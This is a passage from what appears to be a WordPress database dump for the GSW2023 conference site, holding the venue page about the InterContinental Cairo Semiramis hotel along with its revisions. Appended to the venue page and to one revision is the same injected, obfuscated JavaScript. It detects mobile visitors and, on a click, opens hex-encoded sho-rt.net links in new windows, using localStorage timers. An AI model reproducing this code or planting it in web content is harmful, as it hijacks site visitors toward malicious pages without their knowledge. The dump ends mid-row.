style=\"list-style-type: none;\">\n<ul>\n<li><strong>Hotels Special Rate Booking is Opened Now Deadline for the Special Rates is August 10, 2023. </strong></li>\n</ul>\n</li>\n</ul>\n</div>\n<p>[/vc_column_text][vc_btn title=\"BOOK NOW\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][vc_single_image image=\"2936\" img_size=\"1200x1200\"][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','publish','closed','closed','','gsw2023-venue','','','2023-07-28 18:47:38','2023-07-28 18:47:38','',0,'https://gsw2023.com/?page_id=2679',0,'page','',0),
(2681,1,'2022-10-09 02:41:59','2022-10-09 02:41:59','','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2022-10-09 02:41:59','2022-10-09 02:41:59','',2679,'https://gsw2023.com/?p=2681',0,'revision','',0),
(2682,1,'2022-10-09 02:46:48','2022-10-09 02:46:48','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<section class=\"clear\"><strong><a>GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS </a></strong></section>\n<ul>\n<li style=\"text-align: justify;\">\n<h6><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h6>\n</li>\n</ul>\n<div class=\"gap-10\"></div>\n<ul>\n<li><strong><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></strong></li>\n</ul>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2022-10-09 02:46:48','2022-10-09 02:46:48','',2679,'https://gsw2023.com/?p=2682',0,'revision','',0),
(2683,1,'2022-10-09 02:48:32','2022-10-09 02:48:32','','is1','','inherit','open','closed','','is1','','','2022-10-09 02:48:32','2022-10-09 02:48:32','',2679,'https://gsw2023.com/wp-content/uploads/2022/10/is1.jpg',0,'attachment','image/jpeg',0),
(2684,1,'2022-10-09 02:50:44','2022-10-09 02:50:44','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<section class=\"clear\"><strong><a>GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS </a></strong></section>\n<ul>\n<li style=\"text-align: justify;\">\n<h6><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h6>\n</li>\n</ul>\n<div class=\"gap-10\"></div>\n<ul>\n<li><strong><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></strong></li>\n</ul>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps 